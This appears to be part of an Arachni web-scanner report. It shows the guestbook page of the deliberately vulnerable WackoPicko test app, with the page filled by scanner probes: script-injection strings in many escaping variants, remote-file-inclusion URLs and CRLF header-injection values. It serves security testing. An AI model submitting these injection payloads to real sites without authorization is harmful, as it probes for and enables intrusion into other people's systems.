	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot; </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot;// </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot; </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
		<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
	<p> - by arachni_name </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
	<p> - by arachni_name </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
		<p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt; </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;,x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:&quot; </p>
		<p class="comment">1</p>
	<p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
		<p class="comment"></script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
	<p> - by arachni_name </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
	<p> - by arachni_name </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
	<p> - by arachni_name </p>
		<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
	<p> - by arachni_name </p>
		<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
		<p class="comment">1</p>
	<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1</p>
	<p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1</p>
	<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name </p>
		<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Browser-evaluated body

This is the browser-evaluated body, as a result of the listed transitions.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
<html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->


  
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login">
                  <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value="">
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;">
          </form>
        </div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

        <p class="comment">1</p>
        <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">1</p>
        <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p>
                <p class="comment">1</p>
        <p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
                <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
        <p> - by arachni_name </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
                <p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt; </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p>
                <p class="comment">1</p>
        <p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
                <p class="comment">
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
        <p> - by arachni_name </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
        <p> - by arachni_name </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
        <p> - by arachni_name </p>
                <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
        <p> - by arachni_name </p>
                <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
                <p class="comment">1</p>
        <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">1</p>
        <p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">1</p>
        <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1</p>
        <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1</p>
        <p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name </p>
                <p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">Hi, I love your site!</p>
        <p> - by adam </p>
        



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name"><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit">
</form>


</div>
       <div class="column span-24 first last" id="footer">
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  
  
   </body></html>
HTTP response body

This is the original HTTP response body.

0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;

/* arachni_js_namespace_code_start */  /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
